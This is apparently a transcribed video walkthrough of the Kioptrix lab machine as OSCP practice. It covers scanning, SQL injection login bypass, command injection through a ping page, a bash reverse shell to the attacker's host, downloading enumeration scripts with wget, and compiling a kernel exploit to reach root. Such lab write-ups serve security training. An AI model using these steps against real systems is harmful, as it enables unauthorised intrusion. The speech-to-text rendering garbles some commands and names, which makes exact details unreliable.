Alright, so we're about halfway through Kioptrix OSCP box. So far, all we did was a map scan, and that's really all we did so far. And then from there, we found that there was quite a few ports open: 22, 80, 111, 443, 631, 75, which is part of RPC, and 3306. We went ahead and started up a GoBuster, but couldn't find anything really in that one, so we did a Python 3 dir search just to make it go faster. And we are finding some things in here now. We're still finding things. It's got a recursive lookup on there also. So we have that /usage /manual. I'm also wondering, can this guy do Python 3? Can he do HTTPS? Does he care if there's no certificate? No, he doesn't care. So the other one cared if there was no certificate. This one doesn't seem to care, like right here. So GoBuster did though. We also did a Nicto scan down here, and he's saying, hey, he found manual and icons. Yep. Okay. Let's try to do a HTTPS with Nicto scan. See if he cares. I don't know yet. Getting a lot of errors though. A lot of errors. One more. That's just I'm sending two up at the same time. Nicto does work with it. Okay. We'll go ahead and keep that guy running. I don't know if these errors are going to mess me up or not. How bad that's going to mess me up. Well, let's go ahead and check out that port 4, or we still are trying to get into here, right? I've started a burp suite to see if maybe we can do some type of SQL injection to get into it. So we'll go ahead and go to our proxy. Let's go ahead and send up like a login, go back to burp suite, and we'll send this guy to the intruder. So from here we'll go to payloads, or positions, excuse me. We'll get rid of password and login, like right there for our payload, and we'll just stick with just username for like right now. And then for our payload, we'll do a load. So this is going to be in shared wfuzz wordless injections and SQL.text. Let's try to send that one up. It's got 125 in there, so we'll try to start him up and send him there. So if you're doing OSCP, temporary attack, not saved to project file. Okay. So is this guy actually running? Discard. Why is he start attack? Discard. Actually, yeah, I put them all in there, right? The payloads and everything. Position's good. Start attack. I don't know why it's taking so long to start. Can we break him? Let's try to go to HTTPS. How about that? Let's try to go there. Set the can continue. Let's try to just forward this guy off, whatever. And same thing, okay. I wonder if there's any difference between those two. Okay, so this guy's starting to attack him. Alright, so it's starting to work. Now with OSCP you can't do this, but with INE stuff you can. We can also use Zap with INE. So we might be able to do something like that, use Zap and be able to attack it like that. So let me go ahead and start. Make sure that I got this guy right here. Boom. Throw him into here. We'll do port 80 and 443. Did not find anything of use with GoBuster or Nicto. Okay. Say that. We are trying to do a SQL injection like right now, right? So we can throw that into here. A little question mark on it. We know if that's going to work yet. This guy's also taking his sweet time. Now, I know that it slows you down, but Jesus. Let's go ahead and discard that. Exit out of GoBuster, and we'll hop back into it again. Let's go ahead and try to do this with 10, 10, 10, 38 Zap, since we don't get slowed down with him. Like I said, you cannot use this with what is it with OSCP though, Zap. So he's attacking him like right now. He does see that there is a problem here too. He's saying, hey, there is a problem with that guy. There is an SQL injection. That's what he's saying. That's why you can't use him. So attack with Zap or 1=1. But we can also show like how GoBuster would have done it, right? So we can right click, attack. We can fuzz him also. Let's go ahead and just first go fuzz username. We'll add, and we'll go to file, or excuse me, file fuzzers for him. JBro fuzz, and we'll go to injection, and you can just, or SQL injection right here. You just click add, okay, and start fuzzer, and he's just going to fly like right through him because he does not get slowed down or anything. Do we have anything for size response? We do. We got 4 of them. It says SQL injection. I'm not surprised that we have 4 because, you know, it's probably going to be something like this. So apostrophe or 1=1, tab. So let's try that. Apostrophe or 1=1, just like that. And we'll say password is A, whatever. We'll log in. Burp Suite's still up and running, so turn that off. Back. Log in, advanced, yep. Accept risk and continue. Okay, resend. Oh my god. Log in. So he doesn't seem to want to log in with that. Let's try it with HTTP. Okay, he's not logging in with that one. There might not be a space like right there. Let's try this admin or. Let's try that one. That was admin or that. Is that all that was? Yeah, admin or that. So an A and pass. There we go. Okay, cool. So we did the admin or one. So there might not have been a space between this one, like right here. Or 1=1. There may have not been a space. No, that one just doesn't want to work. So admin or that. Boom. Whoops. Admin or that. A. What the heck? Yeah. Let's say an A. Log in. That's super weird because now it's not even letting me like re-log back in. What about this? That's weird. 1 star? Nope, there was definitely a slash there. Star. Yeah. So for some reason it's not allowing me to log back in, so I'm just going to go ahead and copy this, exit out of him, and we'll hop right back into him again, hopefully. 10, or actually I can just Control V. Oh, it's not letting me do that either. 38. That's super weird. Okay, for some reason that's not letting me do anything. Let's go ahead and just copy him. Paste him. Don't save. What in the hell is going on now? This guy isn't on, right? Yeah, no burst or anything. Let's try HTTPS. So what just did work doesn't work anymore, huh? Well, that's stupid. Now what? I mean, that's pretty dumb. It did work and that doesn't. I don't really know what to do now, because now it seems like I broke the box, and it's not like we can just revert it, because it's not, you know. We can't just revert the box, because it's an actual box kind of thing. Can we do a something like that? Yes, I know there's SQL injection, but you're not, I mean, okay, so we did something totally different in lesson. This is as far as Zaplik right here. That should have worked also on the other one over there. If it does, I don't know. We can try it, because who knows now, right? I mean, I want to say it should work, and then there we go. Alright, so we're back over on something, you know, with now a gold bar up top. So let's go ahead. It says to ping something. So let's try ping 127.0.0.1. We'll submit that. And then let's also try ping 10.10.10.15 to see if it's talking back to me. So it can ping itself, okay. And it can talk back to me, okay. Let's try to do stop it and do like an ID. And we can do that also. So we're getting that. Alright, cool. So we can do like a which Python, and we can put a space in there. Okay, we can. Alright, so we put a space without quotations and stuff like that. So let's do a bash reverse shell then. Script on it. NC tac LVMP 9999. I can go ahead and cat my reverse shells. Cat scripts bash reverse shell right. Dot text. We go ahead and grab him. Go ahead and throw him into there. I don't think it needs to be URL encoded. If it does, then we'll intercept it and we'll do it like that. We'll just throw a 10.10.10.15 in there. Port 999. We'll submit that. That's still hanging. That's good. And we did get in. LS TAC LA, and we're in. Okay. Let's go ahead and CD into home. We got a couple people here. CD into Harold. Nope. CD into John. Nope. Cat Etsy password. Cat scripts SUID bits, SUID lookup. Alright, what we got here? Nothing really too exciting, doesn't look like. Some of these can be used with sudo, but we can't. Sudo tac-l maybe? Nope. Okay, so some of them can be used with sudo, but we can't use that like right now. Let's go ahead and I'm going to start with Python server first. And let's go ahead and copy, linkeys over here, and we'll also copy Linux exploit suggester over here. And let's go ahead and CD to 10. And we'll go ahead and grab that linkeys. I already did this box. We'll remove tac RF, all these guys like right here. As you can see, it took me a minute to do a lot of stuff in there. You never know which one works. I still don't remember. Alright, so let's go ahead and we'll do a wget 10.10.10.15 4888 /linp.sh, and then we'll do that same exact thing for les.sh, right? Alright, cool. So let's go ahead and change mode +X for linps.sh and change mode +X for les.sh. I'm going to run linps. We'll see what happens here. So it does say that the Linux version is bad. And that's the only thing that we're seeing so far, is that Linux version is bad. Varlib PHP sessions. So the only thing that I saw was that the Linux version was bad so far. Might be able to do something with MySQL. Is that allowing for unexpected in root? Okay. Or if we can do something with MySQL. 3306 is up and running. I didn't see anything about allowing for root wherever it is to be used. Not seeing anything in here for MySQL yet. That's alright. Let's go ahead and check out let's do a /les.sh. Script needs bash and version 4.0 or newer. Really? Uh-oh. Okay. That's alright, because we can always do a uname tag A, right? And we got Linux calibrate level 2.6.9. So let's go ahead and do a search exploit for Linux kernel 2.6 point something. Alright. Seems there's a one all be all. Okay, here we go. That's what I like to see. 2.6x. I-386 Athlon, okay. And we are looking for some type of local privilege escalation, right? We got pipe C like right here. We got this guy. I don't know what he is. So that's 33322.c. Can't really get on the internet like right now. What else do we have over here? Two 2.6.9. Do we have anything that's like directly for 2.6? Okay. You know, there's something like that. Local privilege escalation, like right there. And we're using I-686. Serial kernel. Local privilege escalation. Right here. 128.10. See something with limpies like real quick. Scrolling back up to the top up here. There we go. And we have mock build CentOS.org Red Hat 3.4.628. This is Red Hat CentOS. That's not quite adding up though, is it? 4.8 to 5.3. We have CentOS. Well, that's just GCC version, like right there. Red Hat 3.4. This has CentOS and Red Hat in it, and these are both for that. Let's grab this guy. Search exploit. Attack him. Alright, we'll go ahead and grab that one like right there. And let's see if he can do it. LSTAC LA. Okay, let's go ahead and do a wget HTTP 10.10.10.15 888/9545.c. Alright, let's go ahead and do a, let's go ahead and cat him, see what I'm supposed to type in for him. 9545.c. We'll go ahead and cat this guy, and we'll see how to actually compile him. I think doing some type of buffer overflow. So he's saying GCC wall. Now you could work with this one up here. I already know that. Can I say like a GCC? Well, we could try that for I386 and PPC. So we have I386 on here. That's not going to work right there, but because it's 9545.c. No new line at the end of file. Okay. Did that work? So can we just, he's already executable. So can we just do a period slash boom. And we are root. CD into root. Cool. There's no flags in here, which is kind of sad. But we are root now. We did get to root, so we have accomplished that machine like right there. I'm wondering if I can do MySQL. TAC U root, TAC P root. MySQL TAC U root admin. No password. Password. Tor. MySQL TAC U admin, TAC P admin. Password. Root. No password. Looks like it worked, but I'm not in an actual shell. Let me see if that actually worked. Ping.php. Well, ping.php is going to act up like this again, then I'm probably not going to try it again. There we go. Let me see if that actually worked right there. Which Python? Okay, so let's go ahead and cat scripts full shell. Okay, that doesn't really do much for me. Let's go ahead and do that MySQL TAC U admin TAC P. Yep, so there we go. Admin no password. Show databases. Select or use test. show tables. There's no tables. Alright, so his database is totally empty. So we just exit out of there. That's useless to us. So that is how you do that guy right there, though. CD back into temp. We can run one more time just so we end the box's root. Don't want to not end his root, you know. Boom, there we go. ID, and we are root. Cool. Alright, so that's how you do Kioptrix 1.2. So that was a pretty good one. Like right there, especially for getting that halfway through. Oh, whoops, I didn't take any notes on that, did I? Alright, so we did find SQL injection. Once in he showed us our date used that the kernel, not just it, the kernel was out of date. We'll save that. Alright, cool. Let's go ahead and get this guy, devices, network settings, back to a bridge adapter. Okay, we'll go ahead and shut that box down, call him pond, exit out of here, power off. Okay, cool. Let me go ahead and right click